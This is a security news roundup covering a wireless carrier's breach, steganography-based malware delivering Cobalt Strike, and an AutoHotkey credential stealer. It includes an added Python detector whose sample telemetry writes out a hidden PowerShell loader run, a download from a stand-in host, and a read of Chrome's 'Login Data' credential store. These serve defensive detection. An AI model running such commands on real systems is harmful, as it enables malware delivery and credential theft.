Cybersecurity Week in Review: 12/28
Posted by: GuidePoint Security
This week we highlight a breach involving customer data of a wireless carrier in the United States; a particularly creative virus whose payload is delivered via steganography; and credential-stealing malware targeting customers of a large US bank.
Telecommunications company’s records breached
A major US telecommunications company began sending notifications to its customers last week informing them of a ‘security incident’ that exposed information in their accounts, including phone numbers and call records.
According to the company, they had recently discovered “malicious, unauthorized access” to their systems. A cybersecurity firm performed an investigation and confirmed a breach to the company’s customer proprietary network information (CPNI).
In a statement, the telecommunications firm indicated: “The CPNI accessed may have included phone number, number of lines subscribed to on your account and, in some cases, call-related information collected as part of the normal operation of your wireless service.” The statement further indicated that no account holder names, physical address, credit card information, social security numbers, email addresses, PINs, or passwords were exposed.
One silver lining to this breach appears to be the small share of customers affected. Only about 0.2% of the company’s roughly 100 million subscribers, approximately 200,000 people, had data stolen.
In breaches such as this, it is common for the criminals to use the stolen information in phishing campaigns. Therefore, the telecommunications company notified affected customers by text alert and encouraged them to watch out for any unusual text messages claiming to be from the telecommunications provider and asking for personal information or containing links to other websites.
This isn’t the first time this particular company experienced a breach—previous incidents exposing customer data occurred in 2018, 2019 and March of 2020.
You can read more on this breach here and here.
Researchers find malware hidden in images
The art of steganography—hiding messages within other messages, objects, or images—has been in use for thousands of years. Cybercriminals still put the technique to use today, as they recently did by hiding instructions for downloading a new strain of malware in image files hosted on a popular image hosting and online sharing site.
The infection begins with a Word file delivered by email. When opened, the file launches macros that download a PowerShell script from GitHub. That script then downloads an image file from the image hosting and sharing site; the pixel values of the image encode the instructions the PowerShell script decodes and executes to deliver the payload.
The payload is a legitimate penetration testing toolkit known as Cobalt Strike. By deploying the toolkit, threat actors can deploy ‘beacons’ on the target devices to conduct remote malicious activities, including executing PowerShell scripts, creating shells, spawning new ‘listener’ sessions, and performing privilege escalation. The malware script includes an EICAR string—a legitimate virus test file that enables cybersecurity professionals to test antivirus software without having to use actual malware. By including an EICAR string, security researchers believe the criminals are attempting to trick both the security tools and the security operations center (SOC) teams into believing the malicious payload is really a legitimate antivirus test currently being performed by cybersecurity professionals.
Once installed, the malicious payload contacted a command and control (C&C) server for further instructions. Since the malware’s discovery by security researchers, however, the domain associated with the C&C server (which had been operational at least as early as 20 December 2020), as well as the GitHub pages, appear to be no longer accessible.
The malware resembles another threat known as MuddyWater, SeedWorm, or TEMP.Zagros first observed in 2017 and distributed by a government-backed advanced persistent threat (APT) group.
Cybercriminals are increasingly using legitimate tools and services such as GitHub and Pastebin to deliver threats. In fact, we recently wrote about the botnet “Gitpaste-12,” which targeted servers and IoT devices for botnet expansion by using GitHub and Pastebin. (You can read more in our article “Malware worm targets servers and IoT devices”). Criminals have also previously used steganography to deploy ransomware.
More information on this new strain of malware is available here.
US and Canadian banking customers targeted with malware
Customers of one of the largest financial institutions in the United States are among those targeted with a recent credential stealing malware written in the AutoHotkey (AHK) scripting language.
AHK is an open-source scripting language for Microsoft Windows, created to provide easy hotkeys and to automate repetitive tasks such as macro creation and software automation in Windows applications.
The malware involves a multi-stage infection chain and begins with an Excel file embedded with a Visual Basic for Applications (VBA) AutoOpen macro used to drop and execute the malware downloader script (“adb.ahk”) via a legitimate AHK script compiler executable (“adb.exe”). The script is designed to achieve persistence, profile victims, and download and run additional AHK scripts from C&C servers located in the US and northern Europe.
The malware specifically targets browsers, including Chrome, Opera, and Edge, for stored user credentials. It downloads an SQLite module to the infected device and uses it to run SQL queries against the SQLite databases in the browsers’ application folders. The credentials are then collected, decrypted, and exfiltrated in plaintext to the C&C server via an HTTP POST request.
What makes the malware particularly distinctive is its use of AHK scripts to carry out different tasks, rather than receiving commands from the C&C server. According to researchers, this approach lets the criminals customize the threat for individual users or groups of users. It also hides key components of the malware from sandboxes and security researchers.
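The two infection chains described above (the Word macro that pulls a PowerShell loader and an image from a hosting site, and the Excel macro that runs adb.ahk through adb.exe and queries the browsers’ SQLite credential stores) share stages that a defender can look for in process-creation telemetry. The following Python detector is an added illustration written for this review; it is not code from the original post or from the researchers it cites. The event record shape, the file paths, the hostnames and the rule names are assumptions constructed for the example; only the adb.exe/adb.ahk names and the browser credential databases come from the post.

```python
import re
from dataclasses import dataclass

# Parent applications whose children we treat as macro-launched (constructed list)
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Script hosts commonly launched by document macros (constructed list)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# File names of the browser credential databases the AHK stealer queried
BROWSER_CRED_DBS = ("login data", "web data")
# A URL in a command line that points at an image file (the stego loader's download step)
IMAGE_URL = re.compile(r"https?://\S+?\.(?:png|jpe?g|gif|bmp)\b")


@dataclass
class ProcEvent:
    """Minimal process-creation record; the shape is an assumption, not a real log format."""
    pid: int
    ppid: int
    image: str
    cmdline: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect(events):
    """Return (pid, rule_name) findings for the chain stages described in the post."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        parent_is_office = parent is not None and basename(parent.image) in OFFICE_APPS
        image = basename(e.image)
        cmd = e.cmdline.lower()

        # Word/Excel macro launching a script host: first stage of both chains
        if parent_is_office and image in SCRIPT_HOSTS:
            findings.append((e.pid, "office_spawned_script_host"))
        # Office child handed a .ahk script; matching on the argument still catches a renamed AHK runtime
        if parent_is_office and ".ahk" in cmd:
            findings.append((e.pid, "office_spawned_ahk_script"))
        # Script host pulling an image file, as the steganography loader does
        if image in SCRIPT_HOSTS and IMAGE_URL.search(cmd):
            findings.append((e.pid, "script_host_fetched_image"))
        # Any process naming a browser credential database, as the AHK stealer's SQLite query does
        if any(db in cmd for db in BROWSER_CRED_DBS):
            findings.append((e.pid, "browser_credential_db_access"))
    return findings


# Constructed sample telemetry: one benign tree plus both chains from the post
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    # Chain 1: Word macro -> PowerShell loader -> image download from a hosting site
    ProcEvent(200, 100, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              "WINWORD.EXE invoice.docm"),
    ProcEvent(300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -w hidden -ep bypass -f C:\Users\u\AppData\Local\Temp\stage1.ps1"),
    ProcEvent(301, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -c Invoke-WebRequest https://img.example.invalid/icons.png"
              r" -OutFile C:\Users\u\AppData\Local\Temp\icons.png"),
    # Chain 2: Excel macro -> adb.exe running adb.ahk -> query of Chrome's Login Data store
    ProcEvent(400, 100, r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
              "EXCEL.EXE statement.xlsm"),
    ProcEvent(500, 400, r"C:\Users\u\AppData\Roaming\adb.exe",
              r"C:\Users\u\AppData\Roaming\adb.exe adb.ahk"),
    ProcEvent(501, 500, r"C:\Users\u\AppData\Roaming\adb.exe",
              r'adb.exe "C:\Users\u\AppData\Local\Google\Chrome\User Data\Default\Login Data"'),
    # Benign: PowerShell started by the user from the desktop
    ProcEvent(600, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe Get-Process"),
]


if __name__ == "__main__":
    for pid, rule in detect(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
```

The rules key on parent-child relationships and command-line arguments rather than on executable names alone, which is why the renamed AHK runtime (adb.exe) is still caught through its .ahk argument, and why a user-launched PowerShell session with no image download and no Office parent produces no finding.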
Security researchers have indicated that the malware is well written and well organized at the code level and includes instructions in Russian, suggesting a hack-for-hire criminal group behind the threat.
More on the AutoHotkey banking malware can be found here and here.
Final Words
Creativity and simplicity are often at the heart of any successful threat, and this week’s stories highlight these concepts extremely well.
Steganography goes back thousands of years (purportedly as far back as 440 BC Greece). Modern steganography applications can involve digital tools such as text, sound, or image files. In the case of the malware that delivered the Cobalt Strike payload, the image used for steganography appeared relatively benign and looked like nothing more than clip art representing icons for .PNG, .JPG, .GIF, and .SWF files.
In the case of the credential-stealing malware created using the AHK scripting language, criminals were able to customize their threats and further obfuscate the malware from security tools, something that might otherwise be difficult using another script execution technique.
And, by simplifying the locations where malicious scripts are stored using legitimate services such as GitHub, criminals can leverage existing tools and services, without having to reinvent and manage them on their own.
Cybercriminals are always looking for a new angle to successfully deliver threats. It pays to never underestimate criminal capabilities, ingenuity and tenacity.
GuidePoint Security